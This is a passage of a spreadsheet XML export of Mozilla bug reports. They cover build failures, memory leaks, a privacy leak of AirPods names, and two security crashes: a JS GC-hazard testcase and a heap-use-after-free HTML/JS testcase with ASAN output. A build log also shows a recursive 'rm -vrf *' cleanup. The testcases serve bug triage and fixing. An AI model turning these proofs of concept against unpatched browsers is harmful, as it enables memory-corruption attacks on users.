      <c r="T6145" t="n">
        <v>1</v>
      </c>
      <c r="U6145" t="n">
        <v>0</v>
      </c>
      <c r="V6145" t="n">
        <v>19</v>
      </c>
      <c r="W6145" t="inlineStr">
        <is>
          <t>Since it's new, my first suspicion would be that while nohup exists, it maybe doesn't exactly always _work_ on Windows.
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1265505248.1265505990.31842.gz
Rev3 WINNT 7.0 mozilla-central talos on 2010/02/06 17:14:08  
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1265505248.1265508537.27258.gz
Rev3 WINNT 7.0 mozilla-central talos dirty on 2010/02/06 17:14:08  
C:\Windows\system32\cmd.exe /c nohup rm -vrf *
...
removed directory: `talos/tpan'
removed `talos/ttest.py'
removed `talos/ttest.pyc'
removed `talos/utils.py'
removed `talos/utils.pyc'
removed `talos/winmo.config'
program finished with exit code 0
elapsedTime=242.818000
=== Output ended ===
======== BuildStep ended ========
======== BuildStep started ========
talos dir creation failed
=== Output ===
C:\Windows\system32\cmd.exe /c mkdir talos
...
A subdirectory or file talos already exists.
program finished with exit code 1</t>
        </is>
      </c>
      <c r="X6145" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6146">
      <c r="A6146" t="n">
        <v>998504</v>
      </c>
      <c r="B6146" t="inlineStr">
        <is>
          <t>2014-04-18 15:13:47 -0700</t>
        </is>
      </c>
      <c r="C6146" t="inlineStr">
        <is>
          <t>[META] window.open()/.close() memory leak</t>
        </is>
      </c>
      <c r="D6146" t="inlineStr">
        <is>
          <t>2015-02-27 12:46:05 -0800</t>
        </is>
      </c>
      <c r="E6146" t="n">
        <v>1</v>
      </c>
      <c r="F6146" t="n">
        <v>1</v>
      </c>
      <c r="G6146" t="n">
        <v>6</v>
      </c>
      <c r="H6146" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6146" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6146" t="inlineStr">
        <is>
          <t>Performance</t>
        </is>
      </c>
      <c r="K6146" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6146" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6146" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6146" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6146" t="inlineStr">
        <is>
          <t>[c=memory p= s= u=1.4] [cr 651835][MemShrink:P1][ETA 5/2]</t>
        </is>
      </c>
      <c r="Q6146" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6146" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6146" t="inlineStr">
        <is>
          <t>2.0 S1 (9may)</t>
        </is>
      </c>
      <c r="T6146" t="n">
        <v>1</v>
      </c>
      <c r="U6146" t="n">
        <v>0</v>
      </c>
      <c r="V6146" t="n">
        <v>53</v>
      </c>
      <c r="W6146" t="inlineStr">
        <is>
          <t>A memory leak is observed on v1.4 in both the main process and content process of an app that repeatedly invokes window.open()/close().
USS/RSS are fine, but VSS blows up.  It seems to be a /dev/ashmem-related fd leak, as |watch ls -l /proc/&lt;b2g_pid&gt;/fd/| shows thousands of open file descriptors right before memory is exhausted and the content process is killed.
STR:
* Run the test app at bug 964386 attachment 8366455 on a QRD device.
This leak does not reproduce with a v1.3 Gecko/Gaia on the same device/gonk/testapp</t>
        </is>
      </c>
      <c r="X6146" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6147">
      <c r="A6147" t="n">
        <v>845904</v>
      </c>
      <c r="B6147" t="inlineStr">
        <is>
          <t>2013-02-27 10:14:56 -0800</t>
        </is>
      </c>
      <c r="C6147" t="inlineStr">
        <is>
          <t>Port newsletter preference center to Bedrock (implementation)</t>
        </is>
      </c>
      <c r="D6147" t="inlineStr">
        <is>
          <t>2013-06-05 12:10:51 -0700</t>
        </is>
      </c>
      <c r="E6147" t="n">
        <v>1</v>
      </c>
      <c r="F6147" t="n">
        <v>1</v>
      </c>
      <c r="G6147" t="n">
        <v>5</v>
      </c>
      <c r="H6147" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6147" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J6147" t="inlineStr">
        <is>
          <t>Newsletters</t>
        </is>
      </c>
      <c r="K6147" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6147" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6147" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6147" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6147" t="inlineStr">
        <is>
          <t>u=dev c=bedrock p=</t>
        </is>
      </c>
      <c r="Q6147" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6147" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6147" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6147" t="n">
        <v>1</v>
      </c>
      <c r="U6147" t="n">
        <v>0</v>
      </c>
      <c r="V6147" t="n">
        <v>3</v>
      </c>
      <c r="W6147" t="inlineStr">
        <is>
          <t>Implementation bug to go with the tracking bug 841056.</t>
        </is>
      </c>
      <c r="X6147" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6148">
      <c r="A6148" t="n">
        <v>468405</v>
      </c>
      <c r="B6148" t="inlineStr">
        <is>
          <t>2008-12-07 21:53:15 -0800</t>
        </is>
      </c>
      <c r="C6148" t="inlineStr">
        <is>
          <t>Connection timeouts when doing reasonable queries</t>
        </is>
      </c>
      <c r="D6148" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E6148" t="n">
        <v>1</v>
      </c>
      <c r="F6148" t="n">
        <v>1</v>
      </c>
      <c r="G6148" t="n">
        <v>4</v>
      </c>
      <c r="H6148" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6148" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6148" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6148" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6148" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6148" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6148" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6148" t="inlineStr"/>
      <c r="Q6148" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6148" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6148" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6148" t="n">
        <v>1</v>
      </c>
      <c r="U6148" t="n">
        <v>0</v>
      </c>
      <c r="V6148" t="n">
        <v>5</v>
      </c>
      <c r="W6148" t="inlineStr">
        <is>
          <t>Since the topcrash page is inaccurate (bug 461977), I've been using queries to see topcrash lists and do analysis on them.
Unfortunately, for about a week, queries haven't been working. I'm getting a "Connection Interrupted" error. These aren't complex queries (or... they *weren't*...), so I'm not sure why.
This basically blocks me from doing my job.
The query I was using:
  Product: Firefox
  Branch: 1.9
  Version: Firefox 3.0.4
  Platform: Mac OS X
  Range: 1 week (default)
While that query fails, I really need to not be able to specify the platform at all, so any fix for this bug needs to take out the "platform" part in testing.</t>
        </is>
      </c>
      <c r="X6148" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6149">
      <c r="A6149" t="n">
        <v>1616661</v>
      </c>
      <c r="B6149" t="inlineStr">
        <is>
          <t>2020-02-19 12:29:11 -0800</t>
        </is>
      </c>
      <c r="C6149" t="inlineStr">
        <is>
          <t>AirPods labels with personally identifiable information should not be exposed to the web</t>
        </is>
      </c>
      <c r="D6149" t="inlineStr">
        <is>
          <t>2020-06-05 00:38:07 -0700</t>
        </is>
      </c>
      <c r="E6149" t="n">
        <v>1</v>
      </c>
      <c r="F6149" t="n">
        <v>1</v>
      </c>
      <c r="G6149" t="n">
        <v>3</v>
      </c>
      <c r="H6149" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6149" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6149" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K6149" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6149" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6149" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6149" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6149" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main74+][adv-esr68.6+]</t>
        </is>
      </c>
      <c r="Q6149" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6149" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6149" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T6149" t="n">
        <v>1</v>
      </c>
      <c r="U6149" t="n">
        <v>0</v>
      </c>
      <c r="V6149" t="n">
        <v>21</v>
      </c>
      <c r="W6149" t="inlineStr">
        <is>
          <t>AirPods seem to become named after their user by default e.g. "Jane Doe’s AirPods" the first time they're connected. Users can change this, if they know how. Most probably don't.
Firefox exposes this to web sites with camera or microphone permission.
This seems like an unintended privacy violation, since nowhere is it apparent to users that device labels are shared with web sites.</t>
        </is>
      </c>
      <c r="X6149" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6150">
      <c r="A6150" t="n">
        <v>769030</v>
      </c>
      <c r="B6150" t="inlineStr">
        <is>
          <t>2012-06-27 13:23:45 -0700</t>
        </is>
      </c>
      <c r="C6150" t="inlineStr">
        <is>
          <t>[traceback] IndexError when requesting non-existent page with unified search</t>
        </is>
      </c>
      <c r="D6150" t="inlineStr">
        <is>
          <t>2012-06-28 07:29:37 -0700</t>
        </is>
      </c>
      <c r="E6150" t="n">
        <v>1</v>
      </c>
      <c r="F6150" t="n">
        <v>1</v>
      </c>
      <c r="G6150" t="n">
        <v>5</v>
      </c>
      <c r="H6150" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6150" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J6150" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K6150" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6150" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6150" t="inlineStr">
        <is>
          <t>u=user c=search p=1</t>
        </is>
      </c>
      <c r="Q6150" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6150" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6150" t="inlineStr">
        <is>
          <t>2012.12</t>
        </is>
      </c>
      <c r="T6150" t="n">
        <v>1</v>
      </c>
      <c r="U6150" t="n">
        <v>0</v>
      </c>
      <c r="V6150" t="n">
        <v>3</v>
      </c>
      <c r="W6150" t="inlineStr">
        <is>
          <t>Traceback (most recent call last):
  File "/data/www/support.mozilla.org/kitsune/vendor/src/django/django/core/handlers/base.py", line 111, in get_response
    response = callback(request, *callback_args, **callback_kwargs)
  File "/data/www/support.mozilla.org/kitsune/vendor/src/django-mobility/mobility/decorators.py", line 23, in wrapper
    return f(request, *args, **kw)
  File "/data/www/support.mozilla.org/kitsune/apps/search/views.py", line 416, in search
    return search_with_es_unified(request, template)
  File "/data/www/support.mozilla.org/kitsune/apps/search/views.py", line 314, in search_with_es_unified
    bounds = documents[0][1]
IndexError: list index out of range
GET:&lt;QueryDict: {u'q': [u'ftp'], u'qs': [u'h'], u'esunified': [u'1'], u'page': [u'81']}&gt;,
I can reproduce it with this url:
https://support.mozilla.org/en-US/search?q=ftp&amp;esunified=1&amp;qs=h&amp;page=81
Seems like it only happens when the page of results doesn't exist (i.e. there are 50 pages of results, but page 81 is requested).
Grabbing it, making it a P1, making it a 2 pointer (no clue how long it'll take, but probably a day), and adding it to the current sprint.</t>
        </is>
      </c>
      <c r="X6150" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6151">
      <c r="A6151" t="n">
        <v>932020</v>
      </c>
      <c r="B6151" t="inlineStr">
        <is>
          <t>2013-10-28 13:33:22 -0700</t>
        </is>
      </c>
      <c r="C6151" t="inlineStr">
        <is>
          <t>CERT_CacheOCSPResponseFromSideChannel fails to set error code in some cases when returning SECFailure</t>
        </is>
      </c>
      <c r="D6151" t="inlineStr">
        <is>
          <t>2013-12-04 12:08:21 -0800</t>
        </is>
      </c>
      <c r="E6151" t="n">
        <v>1</v>
      </c>
      <c r="F6151" t="n">
        <v>1</v>
      </c>
      <c r="G6151" t="n">
        <v>3</v>
      </c>
      <c r="H6151" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6151" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6151" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6151" t="inlineStr">
        <is>
          <t>3.15.4</t>
        </is>
      </c>
      <c r="L6151" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6151" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6151" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6151" t="inlineStr"/>
      <c r="Q6151" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6151" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6151" t="inlineStr">
        <is>
          <t>3.15.4</t>
        </is>
      </c>
      <c r="T6151" t="n">
        <v>1</v>
      </c>
      <c r="U6151" t="n">
        <v>0</v>
      </c>
      <c r="V6151" t="n">
        <v>36</v>
      </c>
      <c r="W6151" t="inlineStr">
        <is>
          <t>When I was testing the NSS head in mozilla-central, I started getting this assertion when visiting https://nmusd-ca.schoolloop.com. The error is almost definitely due to returning SECFailure from some function without calling PR_SetError/PORT_SetError first.
It seems to be a regression caused by the OCSP GET code:
python client.py update_nss NSS_3_15_3_BETA1 -&gt; broken
python client.py update_nss fc6df0051709 -&gt; OK
python client.py update_nss 4be429189df6 -&gt; broken.
In the interests of expediency and reducing risk with the NSS 3.15.3 release, I would like to back out bug 436414 and have land it in NSS 3.15.4 instead. This way we can enable TLS 1.2 in Firefox ASAP by landing NSS 3.15.3 into mozilla-central sooner.
---------------------------
NSGlue_Assertion
---------------------------
ASSERTION: no error set during certificate validation failure: 'Not Reached', file c:/p/firefox/landing/src/security/manager/ssl/src/SSLServerCertVerification.cpp, line 1134
Click Abort to exit the Application.
Click Retry to Debug the Application.
Click Ignore to continue running the Application.
---------------------------
Abort   Retry   Ignore   
---------------------------</t>
        </is>
      </c>
      <c r="X6151" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6152">
      <c r="A6152" t="n">
        <v>619255</v>
      </c>
      <c r="B6152" t="inlineStr">
        <is>
          <t>2010-12-14 18:26:27 -0800</t>
        </is>
      </c>
      <c r="C6152" t="inlineStr">
        <is>
          <t>GC hazard in JO() from json.cpp due to reuse of root (1.9.[12]-only)</t>
        </is>
      </c>
      <c r="D6152" t="inlineStr">
        <is>
          <t>2011-03-29 19:27:27 -0700</t>
        </is>
      </c>
      <c r="E6152" t="n">
        <v>1</v>
      </c>
      <c r="F6152" t="n">
        <v>1</v>
      </c>
      <c r="G6152" t="n">
        <v>3</v>
      </c>
      <c r="H6152" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6152" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6152" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6152" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L6152" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6152" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6152" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6152" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P6152" t="inlineStr">
        <is>
          <t>[sg:dupe 616009]</t>
        </is>
      </c>
      <c r="Q6152" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6152" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6152" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6152" t="n">
        <v>1</v>
      </c>
      <c r="U6152" t="n">
        <v>0</v>
      </c>
      <c r="V6152" t="n">
        <v>12</v>
      </c>
      <c r="W6152" t="inlineStr">
        <is>
          <t>On 1.9.2 branch JO() from json.cpp incorrectly reuse the passed vp parameter for rooting an iterator leading to a GC hazard. The following example demonstrates this for a debug build of JS shell:
function iter() {
    ({});
    gc();
    yield 1;
}
function create_iter() {
    return iter();
}
JSON.stringify({ get o() {
    var obj = {};
    obj.__iterator__ = create_iter;
    return obj;
}});
~/m/192/js/src&gt; ~/b/js/192dbg32/js ~/s/x.js
Segmentation fault (core dumped)
On trunk we are safe due to the conservative GC scanner.</t>
        </is>
      </c>
      <c r="X6152" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6153">
      <c r="A6153" t="n">
        <v>1406750</v>
      </c>
      <c r="B6153" t="inlineStr">
        <is>
          <t>2017-10-08 07:12:50 -0700</t>
        </is>
      </c>
      <c r="C6153" t="inlineStr">
        <is>
          <t>heap-use-after-free in GetContentRectRelativeToSelf</t>
        </is>
      </c>
      <c r="D6153" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:20 -0700</t>
        </is>
      </c>
      <c r="E6153" t="n">
        <v>1</v>
      </c>
      <c r="F6153" t="n">
        <v>1</v>
      </c>
      <c r="G6153" t="n">
        <v>3</v>
      </c>
      <c r="H6153" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6153" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6153" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K6153" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L6153" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6153" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6153" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6153" t="inlineStr">
        <is>
          <t>[adv-main57+][adv-esr52.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6153" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6153" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6153" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T6153" t="n">
        <v>1</v>
      </c>
      <c r="U6153" t="n">
        <v>0</v>
      </c>
      <c r="V6153" t="n">
        <v>60</v>
      </c>
      <c r="W6153" t="inlineStr">
        <is>
          <t>Created attachment 8916386
ASAN output
The following testcase crashes the latest ASAN build of Firefox 52 ESR. scripts.html needs to be in the same directory.
crash.html:
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o147=document.documentElement;
	o200=o147.querySelector('*:not([id])');
	o243=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o243.src='scripts.html';
	document.documentElement.appendChild(o243);
}
function fun0(doc) {
	o519=doc;
	o527=o519.querySelector('*:not([id])');
	o593=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o200.appendChild(o593);
}
function fun1() {
	spin();
}
function fun2() {
	o200.setAttribute('style','all: unset');
	o697=o593.contentWindow;
	o698=o697.document;
	document.documentElement.appendChild(o698.replaceChild(o519.documentElement,o698.documentElement));
	o593.contentWindow.onresize=fun3;
}
function fun3() {
	document.documentElement.appendChild(o200);
	window.top.document.documentElement.appendChild(o527);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
scripts.html:
&lt;marquee id='id8' &gt;
&lt;script&gt;
window.top.fun0(document);
&lt;/script&gt;
&lt;style&gt;
::first-line { 
&lt;/style&gt;
&lt;script&gt;
window.top.fun1();
&lt;/script&gt;
&lt;script&gt;
window.top.fun2();
&lt;/script&gt;
ASAN output:
=================================================================
==9825==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000a46120 at pc 0x7f818075fda1 bp 0x7ffccb993750 sp 0x7ffccb993748
READ of size 8 at 0x625000a46120 thread T0
    #0 0x7f818075fda0 in GetUsedBorderAndPadding /home/worker/workspace/build/src/layout/generic/nsIFrame.h:1125:12
    #1 0x7f818075fda0 in GetContentRectRelativeToSelf /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:1233
    #2 0x7f818075fda0 in nsIFrame::GetContentRect() const /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:1243
    #3 0x7f81801a30fb in nsComputedDOMStyle::DoGetWidth() /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:4844:22
    #4 0x7f8180168225 in nsComputedDOMStyle::GetPropertyCSSValue(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:807:11
    #5 0x7f8180166386 in nsComputedDOMStyle::GetPropertyValue(nsAString_internal const&amp;, nsAString_internal&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:379:26
    #6 0x7f81801661a8 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsAString_internal&amp;) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:317:10
    #7 0x7f817ca51ee9 in GetWidth /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:4392:1
    #8 0x7f817ca51ee9 in mozilla::dom::CSS2PropertiesBinding::get_width(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:42528
    #9 0x7f817e017f80 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2824:13
    #10 0x7f81843a2de5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #11 0x7f81843a2de5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #12 0x7f81843a3a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #13 0x7f8183e748ed in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #14 0x7f817af79022 in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3330:12
    #15 0x7f817af79022 in xpc::XrayWrapper&lt;js::CrossCompartmentWrapper, xpc::DOMXrayTraits&gt;::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/xpconnect/wrappers/XrayWrapper.cpp:2247
    #16 0x7f81840eceee in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:309:12
    #17 0x7f81840ed28c in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1522:16
    #18 0x7f81840ed28c in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:305
    #19 0x7f81843af0e1 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1522:16
    #20 0x7f81843af0e1 in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:846
    #21 0x7f81843af0e1 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4263
    #22 0x7f818438769c in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #23 0x7f818438769c in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2639
    #24 0x7f81843683ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #25 0x7f81843a344f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #26 0x7f81843a3a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #27 0x7f8183e72682 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #28 0x7f817f8949bb in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #29 0x7f817f8949bb in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #30 0x7f817f85e56e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #31 0x7f817f85e36e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #32 0x7f81806e1003 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #33 0x7f81806e1003 in XBLConstructorRunner::Run() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1687
    #34 0x7f817c0e24ae in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
    #35 0x7f81805eb64a in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2865:5
    #36 0x7f81805eb64a in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2158
    #37 0x7f8181375989 in SetVisibility /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6486:5
    #38 0x7f8181375989 in non-virtual thunk to nsDocShell::SetVisibility(bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6476
    #39 0x7f817c57bf0a in nsFrameLoader::Show(int, int, int, int, nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:864:3
    #40 0x7f8180983205 in nsSubDocumentFrame::ShowViewer() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:188:9
    #41 0x7f8180a01682 in AsyncFrameInit::Run() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:90:7
    #42 0x7f817c0e24ae in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
    #43 0x7f818068a3d3 in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2865:5
